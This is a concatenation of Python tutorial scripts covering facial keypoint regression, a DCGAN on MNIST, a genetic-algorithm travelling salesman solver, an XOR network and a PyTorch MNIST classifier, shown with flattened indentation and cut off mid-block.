# keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
# frame = show_keypoints_cv2(frame, keypoints)
image = show_keypoints_cv2(image, keypoints)
cv2.imshow("frame", image)
if cv2.waitKey(1) == ord("q"):
break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
HUBER_DELTA = 0.5
x = K.abs(y_true - y_pred)
x = K.switch(x < HUBER_DELTA, 0.5 * x ** 2, HUBER_DELTA * (x - 0.5 * HUBER_DELTA))
return K.sum(x)
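# A plain-numpy sketch of the same piecewise Huber rule, for a quick sanity
# check (illustration only; training uses the Keras version above):
import numpy as np
def _smooth_l1_np(y_true, y_pred, delta=0.5):
    x = np.abs(y_true - y_pred)
    return np.where(x < delta, 0.5 * x ** 2, delta * (x - 0.5 * delta)).sum()
# small errors are squared, large ones grow linearly:
# _smooth_l1_np(np.array([0.0, 0.0]), np.array([0.2, 2.0])) == 0.02 + 0.875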
def create_model(input_shape, output_shape):
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
# model.add(Dropout(0.25))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
# model.add(Activation("relu"))
# model.add(MaxPooling2D(pool_size=(2, 2)))
# # model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(256))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(output_shape, activation="linear"))
# print the summary of the model architecture
model.summary()
# training the model using rmsprop optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
def create_mobilenet_model(input_shape, output_shape):
model = MobileNetV2(input_shape=input_shape)
# drop the classification head; note that layers.pop() only edits the layer
# list, the Model(...) call below is what actually rewires the graph
model.layers.pop()
# freeze all the weights of the model except for the last 4 layers
for layer in model.layers[:-4]:
layer.trainable = False
# construct our output dense layer
output = Dense(output_shape, activation="linear")
# connect it to the model
output = output(model.layers[-1].output)
model = Model(inputs=model.inputs, outputs=output)
model.summary()
# training the model using adam optimizer
# model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
return model
IMAGE_SIZE = (224, 224)
OUTPUT_SHAPE = (68, 2)
BATCH_SIZE = 20
EPOCHS = 30
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
predicted_keypoints = model.predict(X)
predicted_keypoints = predicted_keypoints.reshape(-1, *OUTPUT_SHAPE)
return predicted_keypoints
def show_keypoints(image, predicted_keypoints, true_keypoints):
predicted_keypoints = untransform(predicted_keypoints)
true_keypoints = untransform(true_keypoints)
plt.imshow(np.squeeze(image), cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def untransform(keypoints):
return keypoints * 224
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
for i in range(50):
show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
# show the image
plt.imshow(image)
# use scatter() to plot the keypoints in the faces
plt.scatter(key_points[:, 0], key_points[:, 1], s=20, marker=".")
plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(X_test, y_test),
# callbacks=[tensorboard, checkpoint],
callbacks=[tensorboard],
verbose=1)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
# predicted_keypoints = untransform(predicted_keypoints)
plt.imshow(image, cmap="gray")
plt.scatter(predicted_keypoints[:, 0], predicted_keypoints[:, 1], s=20, marker=".", c="m")
if true_keypoints is not None:
# true_keypoints = untransform(true_keypoints)
plt.scatter(true_keypoints[:, 0], true_keypoints[:, 1], s=20, marker=".", c="g")
plt.show()
def resize_image(image, image_size):
return cv2.resize(image, image_size)
def random_crop(image, keypoints):
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
keypoints = keypoints.reshape(-1, 2)
try:
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
except ValueError:
return image, keypoints
image = image[top: top + new_h, left: left + new_w]
keypoints = keypoints - [left, top]
return image, keypoints
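# worked example of the keypoint shift above (commented out): a crop with
# top=10, left=20 moves a keypoint at (x=50, y=40) to (50 - 20, 40 - 10) = (30, 30),
# i.e. keypoints are re-expressed in the cropped coordinate frame:
# kp = np.array([[50.0, 40.0]])
# print(kp - [20, 10])  # -> [[30. 30.]]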
def normalize_image(image, to_gray=True):
if image.ndim == 3 and image.shape[2] == 4:
# if the image has an alpha color channel (opacity)
# let's just remove it
image = image[:, :, :3]
# get the height & width of image
h, w = image.shape[:2]
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
# scaling the image to that IMAGE_SIZE
# image = cv2.resize(image, (new_w, new_h))
image = resize_image(image, (new_w, new_h))
if to_gray:
# convert image to grayscale
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# normalizing pixels from the range [0, 255] to [0, 1]
image = image / 255.0
if to_gray:
image = np.expand_dims(image, axis=2)
return image
def normalize_keypoints(image, keypoints):
# get the height & width of image
h, w = image.shape[:2]
# reshape to coordinates (x, y)
# i.e converting a vector of (136,) to the 2D array (68, 2)
new_h, new_w = IMAGE_SIZE
new_h, new_w = int(new_h), int(new_w)
keypoints = keypoints.reshape(-1, 2)
# scale the keypoints also
keypoints = keypoints * [new_w / w, new_h / h]
keypoints = keypoints.reshape(-1)
# normalizing keypoints from [0, IMAGE_SIZE] to [0, 1] (experimental)
keypoints = keypoints / 224
# keypoints = (keypoints - 100) / 50
return keypoints
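# worked example of the scaling above: a keypoint at (100, 50) in a 400x200
# (w x h) image maps to (100 * 224/400, 50 * 224/200) = (56, 56) after resizing
# to 224x224, and dividing by 224 normalizes it to (0.25, 0.25)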
def normalize(image, keypoints, to_gray=True):
image, keypoints = random_crop(image, keypoints)
return normalize_image(image, to_gray=to_gray), normalize_keypoints(image, keypoints)
def load_data(csv_file, to_gray=True):
# read the training dataframe
df = pd.read_csv(csv_file)
all_keypoints = np.array(df.iloc[:, 1:])
image_names = list(df.iloc[:, 0])
# load images
# preallocate arrays (1 channel when converting to grayscale, 3 otherwise)
channels = 1 if to_gray else 3
X = np.zeros((len(image_names), *IMAGE_SIZE, channels), dtype="float32")
y = np.zeros((len(image_names), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
for i, (image_name, keypoints) in enumerate(zip(tqdm(image_names, "Loading " + os.path.basename(csv_file)), all_keypoints)):
# note: image paths are resolved under data/training for both CSVs; adjust if test images live elsewhere
image = mpimg.imread(os.path.join("data", "training", image_name))
image, keypoints = normalize(image, keypoints, to_gray=to_gray)
X[i] = image
y[i] = keypoints
return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
def __init__(self, img_x=28, img_y=28, img_z=1):
self.img_x = img_x
self.img_y = img_y
self.img_z = img_z
self.D = None # discriminator
self.G = None # generator
self.AM = None # adversarial model
self.DM = None # discriminator model
def discriminator(self):
if self.D:
return self.D
self.D = Sequential()
depth = 64
dropout = 0.4
input_shape = (self.img_x, self.img_y, self.img_z)
self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*2, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*4, 5, strides=2, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
self.D.add(Conv2D(depth*8, 5, strides=1, padding="same"))
self.D.add(LeakyReLU(0.2))
self.D.add(Dropout(dropout))
# convert to 1 dimension
self.D.add(Flatten())
self.D.add(Dense(1, activation="sigmoid"))
print("="*50, "Discriminator", "="*50)
self.D.summary()
return self.D
def generator(self):
if self.G:
return self.G
self.G = Sequential()
dropout = 0.4
# converting the 100-dim noise vector to dim x dim x depth
# i.e. (100,) to (7, 7, 256)
depth = 64 * 4
dim = 7
self.G.add(Dense(dim*dim*depth, input_dim=100))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Reshape((dim, dim, depth)))
self.G.add(Dropout(dropout))
# upsampling to (14, 14, 128)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 2, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# up to (28, 28, 64)
self.G.add(UpSampling2D())
self.G.add(Conv2DTranspose(depth // 4, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 32)
self.G.add(Conv2DTranspose(depth // 8, 5, padding="same"))
self.G.add(BatchNormalization(momentum=0.9))
self.G.add(Activation("relu"))
self.G.add(Dropout(dropout))
# to (28, 28, 1) (img)
self.G.add(Conv2DTranspose(1, 5, padding="same"))
self.G.add(Activation("sigmoid"))
print("="*50, "Generator", "="*50)
self.G.summary()
return self.G
def discriminator_model(self):
if self.DM:
return self.DM
# optimizer = RMSprop(lr=0.001, decay=6e-8)
optimizer = Adam(0.0002, 0.5)
self.DM = Sequential()
self.DM.add(self.discriminator())
self.DM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.DM
def adversarial_model(self):
if self.AM:
return self.AM
# optimizer = RMSprop(lr=0.001, decay=3e-8)
optimizer = Adam(0.0002, 0.5)
self.AM = Sequential()
self.AM.add(self.generator())
self.AM.add(self.discriminator())
self.AM.compile(loss="binary_crossentropy", optimizer=optimizer, metrics=["accuracy"])
return self.AM
class MNIST:
def __init__(self):
self.img_x = 28
self.img_y = 28
self.img_z = 1
self.steps = 0
self.load_data()
self.create_models()
# used image indices
self._used_indices = set()
def load_data(self):
(self.X_train, self.y_train), (self.X_test, self.y_test) = mnist.load_data()
# reshape to (num_samples, 28, 28 , 1)
self.X_train = np.expand_dims(self.X_train, axis=-1)
self.X_test = np.expand_dims(self.X_test, axis=-1)
def create_models(self):
self.GAN = GAN()
self.discriminator = self.GAN.discriminator_model()
self.adversarial = self.GAN.adversarial_model()
self.generator = self.GAN.generator()
discriminators = glob.glob("discriminator_*.h5")
generators = glob.glob("generator_*.h5")
adversarial = glob.glob("adversarial_*.h5")
if len(discriminators) != 0:
print("[+] Found a discriminator ! Loading weights ...")
self.discriminator.load_weights(discriminators[0])
if len(generators) != 0:
print("[+] Found a generator ! Loading weights ...")
self.generator.load_weights(generators[0])
if len(adversarial) != 0:
print("[+] Found an adversarial model ! Loading weights ...")
self.steps = int(adversarial[0].replace("adversarial_", "").replace(".h5", ""))
self.adversarial.load_weights(adversarial[0])
def get_unique_random(self, batch_size=256):
indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# while in_used_indices:
# indices = np.random.randint(0, self.X_train.shape[0], size=batch_size)
# in_used_indices = np.any([i in indices for i in self._used_indices])
# self._used_indices |= set(indices)
# if len(self._used_indices) > self.X_train.shape[0] // 2:
# if used indices is more than half of training samples, clear it
# that is to enforce it to train at least more than half of the dataset uniquely
# self._used_indices.clear()
return indices
def train(self, train_steps=2000, batch_size=256, save_interval=0):
noise_input = None
steps = tqdm.tqdm(list(range(self.steps, train_steps)))
fake = np.zeros((batch_size, 1))
real = np.ones((batch_size, 1))
for i in steps:
real_images = self.X_train[self.get_unique_random(batch_size)]
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
noise = np.random.normal(size=(batch_size, 100))
fake_images = self.generator.predict(noise)
# get 256 real images and 256 fake images
d_loss_real = self.discriminator.train_on_batch(real_images, real)
d_loss_fake = self.discriminator.train_on_batch(fake_images, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# X = np.concatenate((real_images, fake_images))
# y = np.zeros((2*batch_size, 1))
# 0 for fake and 1 for real
# y[:batch_size, :] = 1
# shuffle
# shuffle_in_unison(X, y)
# d_loss = self.discriminator.train_on_batch(X, y)
# y = np.ones((batch_size, 1))
# noise = np.random.uniform(-1.0, 1.0, size=(batch_size, 100))
# fool the adversarial model, telling it everything is real
a_loss = self.adversarial.train_on_batch(noise, real)
log_msg = f"[D loss: {d_loss[0]:.6f}, D acc: {d_loss[1]:.6f} | A loss: {a_loss[0]:.6f}, A acc: {a_loss[1]:.6f}]"
steps.set_description(log_msg)
if save_interval > 0:
noise_input = np.random.uniform(low=-1, high=1.0, size=(16, 100))
if (i + 1) % save_interval == 0:
self.plot_images(save2file=True, samples=noise_input.shape[0], noise=noise_input, step=(i+1))
self.discriminator.save(f"discriminator_{i+1}.h5")
self.generator.save(f"generator_{i+1}.h5")
self.adversarial.save(f"adversarial_{i+1}.h5")
def plot_images(self, save2file=False, fake=True, samples=16, noise=None, step=0):
filename = "mnist_fake.png"
if fake:
if noise is None:
noise = np.random.uniform(-1.0, 1.0, size=(samples, 100))
else:
filename = f"mnist_{step}.png"
images = self.generator.predict(noise)
else:
i = np.random.randint(0, self.X_train.shape[0], samples)
images = self.X_train[i]
if noise is None:
filename = "mnist_real.png"
plt.figure(figsize=(10, 10))
for i in range(images.shape[0]):
plt.subplot(4, 4, i+1)
image = images[i]
image = np.reshape(image, (self.img_x, self.img_y))
plt.imshow(image, cmap="gray")
plt.axis("off")
plt.tight_layout()
if save2file:
plt.savefig(filename)
plt.close("all")
else:
plt.show()
# https://stackoverflow.com/questions/4601373/better-way-to-shuffle-two-numpy-arrays-in-unison
def shuffle_in_unison(a, b):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
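# quick demo (commented out): resetting the RNG state between the two shuffles
# applies the same permutation to both arrays, so (a[i], b[i]) pairs stay aligned:
# a = np.arange(5)
# b = np.arange(5) * 10
# shuffle_in_unison(a, b)
# assert np.array_equal(a * 10, b)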
if __name__ == "__main__":
mnist_gan = MNIST()
mnist_gan.train(train_steps=10000, batch_size=256, save_interval=500)
mnist_gan.plot_images(fake=True, save2file=True)
mnist_gan.plot_images(fake=False, save2file=True)
import random
import numpy as np
import pandas as pd
import operator
import matplotlib.pyplot as plt
from threading import Event, Thread
class Individual:
def __init__(self, obj):
self.object = obj
def update(self, new):
self.object = new
def __repr__(self):
return str(self.object)
def __str__(self):
return str(self.object)
class GeneticAlgorithm:
"""General purpose genetic algorithm implementation"""
def __init__(self, individual, popsize, elite_size, mutation_rate, generations, fitness_func, plot=True, prn=True, animation_func=None):
self.individual = individual
self.popsize = popsize
self.elite_size = elite_size
self.mutation_rate = mutation_rate
self.generations = generations
if not callable(fitness_func):
raise TypeError("fitness_func must be a callable object.")
self.get_fitness = fitness_func
self.plot = plot
self.prn = prn
self.population = self._init_pop()
self.animate = animation_func
def calc(self):
"""Try to find the best individual.
This function returns (initial_individual, final_individual, """
sorted_pop = self.sortpop()
initial_route = self.population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
progress = [ distance ]
if callable(self.animate):
self.plot = True
individual = Individual(initial_route)
stop_animation = Event()
self.animate(individual, progress, stop_animation, plot_conclusion=initial_route)
else:
self.plot = False
if self.prn:
print(f"Initial distance: {distance}")
try:
if self.plot:
for i in range(self.generations):
population = self.next_gen()
sorted_pop = self.sortpop()
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
individual.update(route)
else:
for i in range(self.generations):
population = self.next_gen()
distance = 1 / self.sortpop()[0][1]
if self.prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
try:
stop_animation.set()
except NameError:
pass
final_route_index = self.sortpop()[0][0]
final_route = population[final_route_index]
if self.prn:
print("Final route:", final_route)
return initial_route, final_route, distance
def create_population(self):
return random.sample(self.individual, len(self.individual))
def _init_pop(self):
return [ self.create_population() for i in range(self.popsize) ]
def sortpop(self):
"""This function calculates the fitness of each individual in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, self.get_fitness(individual)) for i, individual in enumerate(self.population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(self):
sorted_pop = self.sortpop()
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
df['cum_sum'] = df['Fitness'].cumsum()
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(self.elite_size) ]
for _ in range(len(sorted_pop) - self.elite_size):
pick = random.random() * 100
for j in range(len(sorted_pop)):
if pick <= df['cum_perc'][j]:
result.append(sorted_pop[j][0])
break
return [ self.population[index] for index in result ]
def breed(self, parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(self, selection):
pool = random.sample(selection, len(selection))
children = [selection[i] for i in range(self.elite_size)]
children.extend([self.breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - self.elite_size)])
return children
def mutate(self, individual):
individual_length = len(individual)
for swapped in range(individual_length):
if(random.random() < self.mutation_rate):
swap_with = random.randint(0, individual_length-1)
individual[swapped], individual[swap_with] = individual[swap_with], individual[swapped]
return individual
def mutate_population(self, children):
return [ self.mutate(individual) for individual in children ]
def next_gen(self):
selection = self.selection()
children = self.breed_population(selection)
self.population = self.mutate_population(children)
return self.population
from genetic import plt
from genetic import Individual
from threading import Thread
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for i, city in enumerate(route):
if i == 0:
col.text(city.x-5, city.y+5, "Start")
col.scatter(city.x, city.y, s=70, c='g')
else:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
plt.show()
def animate_progress(route, progress, stop_animation, plot_conclusion=None):
def animate():
nonlocal route
_, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
if isinstance(route, Individual):
target = route.object
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for i, city in enumerate(target):
if i == 0:
ax1[0].text(city.x-5, city.y+5, "Start")
ax1[0].scatter(city.x, city.y, s=70, c='g')
else:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in target ], [city.y for city in target], c='r')
ax1[0].plot([target[-1].x, target[0].x], [target[-1].y, target[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
if plot_conclusion:
initial_route = plot_conclusion
plot_routes(initial_route, target)
Thread(target=animate).start()
import matplotlib.pyplot as plt
import random
import numpy as np
import operator
from plots import animate_progress, plot_routes
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
def get_fitness(route):
def get_distance():
distance = 0
for i in range(len(route)):
from_city = route[i]
to_city = route[i+1] if i+1 < len(route) else route[0]
distance += (from_city - to_city)
return distance
return 1 / get_distance()
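# worked example (commented out): a square tour with side 10 has length 40,
# so its fitness is 1/40 = 0.025; shorter tours yield larger fitness values:
# square = [City(0, 0), City(10, 0), City(10, 10), City(0, 10)]
# print(get_fitness(square))  # -> 0.025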
def load_cities():
return [ City(city[0], city[1]) for city in [(169, 20), (103, 24), (41, 9), (177, 76), (138, 173), (163, 108), (93, 34), (200, 84), (19, 184), (117, 176), (153, 30), (140, 29), (38, 108), (89, 183), (18, 4), (174, 38), (109, 169), (93, 23), (156, 10), (171, 27), (164, 91), (109, 194), (90, 169), (115, 37), (177, 93), (169, 20)] ]
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
def benchmark(cities):
popsizes = [60, 80, 100, 120, 140]
elite_sizes = [5, 10, 20, 30, 40]
mutation_rates = [0.02, 0.01, 0.005, 0.003, 0.001]
generations = 1200
iterations = len(popsizes) * len(elite_sizes) * len(mutation_rates)
iteration = 0
gens = {}
for popsize in popsizes:
for elite_size in elite_sizes:
for mutation_rate in mutation_rates:
iteration += 1
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, prn=False)
# note: assumes a calc() variant accepting ret=("generation", target_distance) that
# returns the generation at which the target distance was reached; the calc()
# defined above takes no ret argument and returns (initial_route, final_route, distance)
initial_route, final_route, generation = gen.calc(ret=("generation", 755))
if generation == generations:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): could not reach the solution")
else:
print(f"[{iteration}/{iterations}] (popsize={popsize}, elite_size={elite_size}, mutation_rate={mutation_rate}): {generation} generations was enough")
if generation != generations:
gens[iteration] = generation
# reversed_gen = {v:k for k, v in gens.items()}
output = sorted(gens.items(), key=operator.itemgetter(1))
for iteration_number, generation in output:
print(f"Iteration: {iteration_number} generations: {generation}")
# [1] (popsize=60, elite_size=30, mutation_rate=0.001): 235 generations was enough
# [2] (popsize=80, elite_size=20, mutation_rate=0.001): 206 generations was enough
# [3] (popsize=100, elite_size=30, mutation_rate=0.001): 138 generations was enough
# [4] (popsize=120, elite_size=30, mutation_rate=0.002): 117 generations was enough
# [5] (popsize=140, elite_size=20, mutation_rate=0.003): 134 generations was enough
# Notes:
# 1.1 Increasing the mutation rate too much makes the distance curve inconsistent
#     and prevents convergence to the optimal distance.
# 1.2 So keep the mutation rate as small as 1% or lower.
# 2. The elite size should be about 30% or less of the total population.
# 3. The number of generations depends on the other parameters; it can be fixed,
#    or training can run until the optimal distance is reached.
if __name__ == "__main__":
from genetic import GeneticAlgorithm
cities = load_cities()
# cities = generate_cities(50)
# parameters
popsize = 120
elite_size = 30
mutation_rate = 0.1
generations = 400
gen = GeneticAlgorithm(cities, popsize=popsize, elite_size=elite_size, mutation_rate=mutation_rate, generations=generations, fitness_func=get_fitness, animation_func=animate_progress)
initial_route, final_route, distance = gen.calc()
import tensorflow as tf
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import re
import numpy as np
import os
import time
import json
from glob import glob
from PIL import Image
import pickle
import numpy as np
from keras.utils import np_utils
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation
np.random.seed(19)
X = np.array([[0,0],[0,1],[1,0],[1,1]]).astype('float32')
y = np.array([[0],[1],[1],[0]]).astype('float32')
y = np_utils.to_categorical(y)
xor = Sequential()
# add required layers
xor.add(Dense(8, input_dim=2))
# hyperbolic tangent function to the first hidden layer ( 8 nodes )
xor.add(Activation("tanh"))
xor.add(Dense(8))
xor.add(Activation("relu"))
# output layer
xor.add(Dense(2))
# sigmoid function to the output layer ( final )
xor.add(Activation("sigmoid"))
# Cross-entropy error function
xor.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
# show the summary of the model
xor.summary()
xor.fit(X, y, epochs=400, verbose=1)
# accuracy
score = xor.evaluate(X, y)
print(f"Accuracy: {score[-1]}")
# Checking the predictions
print("\nPredictions:")
print(xor.predict(X))
import torch
import torchvision
from torchvision import transforms, datasets
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import matplotlib.pyplot as plt
epochs = 3
batch_size = 64
# building the network now
class Net(nn.Module):
def __init__(self):
super().__init__()
# takes 28x28 images
self.fc1 = nn.Linear(28*28, 64)
self.fc2 = nn.Linear(64, 64)
self.fc3 = nn.Linear(64, 64)
self.fc4 = nn.Linear(64, 10)
def forward(self, x):
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = self.fc4(x)
return F.log_softmax(x, dim=1)
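# shape sketch (commented out): the network maps a batch of flattened 28x28
# images to per-class log-probabilities:
# net = Net()
# out = net(torch.rand(4, 28 * 28))
# print(out.shape)  # -> torch.Size([4, 10])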
if __name__ == "__main__":
training_set = datasets.MNIST("", train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
test_set = datasets.MNIST("", train=False, download=True,
transform=transforms.Compose([
transforms.ToTensor()
]))
# load the dataset
train = torch.utils.data.DataLoader(training_set, batch_size=batch_size, shuffle=True)
test = torch.utils.data.DataLoader(test_set, batch_size=batch_size, shuffle=False)
# construct the model
net = Net()
# specify the loss and optimizer
criterion = nn.CrossEntropyLoss()  # unused below; F.nll_loss is applied since the net outputs log-probabilities
optimizer = optim.Adam(net.parameters(), lr=0.001)
# training the model
for epoch in range(epochs):
for data in train:
# data is the batch of data now
# X are the features, y are labels
X, y = data
net.zero_grad() # set gradients to 0 before loss calculation
output = net(X.view(-1, 28*28)) # feed data to the network
loss = F.nll_loss(output, y) # calculating the negative log likelihood
loss.backward() # back propagation
optimizer.step() # attempt to optimize weights to account for loss/gradients
print(loss)
correct = 0
total = 0
with torch.no_grad():
